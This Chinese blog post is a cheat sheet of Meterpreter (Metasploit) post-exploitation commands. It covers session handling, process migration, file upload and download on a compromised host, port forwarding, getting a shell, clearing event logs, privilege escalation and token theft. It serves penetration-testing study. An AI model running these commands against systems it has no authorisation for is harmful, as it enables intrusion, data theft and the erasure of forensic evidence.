首页 - 文章 - 网络安全 - 正文 Meterpreter的简单介绍 admin 网络安全 2020年5月26日 3.02W 0 23Meterpreter 是MSF自带一个强大的SHELL,可以执行很多功能。Meterpreter SHELL基本操作meterpreter>background #session隐藏到后台 meterpreter>bgkill #杀掉后台的一个meterpreter meterpreter>bglist #列出后台的meterpreter meterpreter>bgrun #运行后台的一个meterpreter msf> sessions -l #查看回话session的list msf> sessions 4 #切回四号回话,用于和background反操作查看系统信息meterpreter>sysinfo #获取系统信息meterpreter>getuid #获取当前注入的用户名称转移注入进程meterpreter>ps #查看进程list meterpreter>migrate pid #转移注入点的继承转移注入进程后,源进程被杀掉,并不影响meterpreter的会话文件和路径类的操作meterpreter>ls meterpreter>pwd meterpreter>mkdir meterpreter>mv meterpreter>rm meterpreter>rmdir #以上常见操作不在赘述 meterpreter>show_mount #展示磁盘情况 meterpreter>search -d c:\\ -f *.doc # -d 路径 -f 文件名模式 搜索文件 例如搜索日志文件 *.evtx meterpreter>upload /localpath/localfile c:\\remote\\remotepath #上传文件 meterpreter>download c:\\xxx\xxx.xxx /root/... #下载文件 meterpreter>edit xxx #编辑文件,VIM的网络配置及其命令meterpreter>arp #展示arp meterpreter>getproxy #获取代理信息 meterpreter>ifconfig(ipconfig) #查看网卡信息 meterpreter>route #打印路由 meterpreter>netstat #查看网络连接情况 meterpreter>resolve #dns解析 meterpreter>portfwd #端口转发portfwd add -l 1122 -p 3389 -r 192.168.250.176系统操作及其命令meterpreter>shell #获取cmdshell meterpreter>clearev #清除event log meterpreter>execute #执行command meterpreter>getpid(getuid、getdsid) meterpreter>getpriv #提权 meterpreter>shutdown #关机 meterpreter>reboot #重启 meterpreter>steal_token #窃取token meterpreter>sysinfo #系统信息 meterpreter>localtime #获取系统时间用户接口指令操作Windows排查进程任务管理器看不到,但是tasklist和netstat 可以看到打赏 本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。 分享: 扫描分享到社交APP 生成封面 精简阅读 ♥赞23 上一篇:[后渗透]获取到 Meterpreter 之后的操作 下一篇:Windows内核漏洞利用提权教程